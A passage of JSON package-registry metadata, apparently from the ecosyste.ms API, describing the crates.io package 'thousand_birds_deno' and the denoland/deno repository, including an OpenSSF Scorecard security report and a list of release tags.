finch","email":null,"url":"https://github.com/afinch7","packages_count":1,"html_url":"https://crates.io/users/afinch7","role":null,"created_at":"2022-11-07T18:29:28.490Z","updated_at":"2022-11-07T18:29:28.490Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/afinch7/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":10958372,"name":"thousand_birds_deno","ecosystem":"cargo","description":"Provides the deno executable","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2024-10-09T05:13:20.863Z","latest_release_published_at":"2024-10-09T05:13:20.863Z","latest_release_number":"1.46.3","last_synced_at":"2026-08-29T21:56:59.029Z","created_at":"2024-10-09T05:29:36.402Z","updated_at":"2026-08-29T21:56:59.031Z","registry_url":"https://crates.io/crates/thousand_birds_deno/","install_command":"cargo install thousand_birds_deno","documentation_url":"https://docs.rs/thousand_birds_deno/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","ki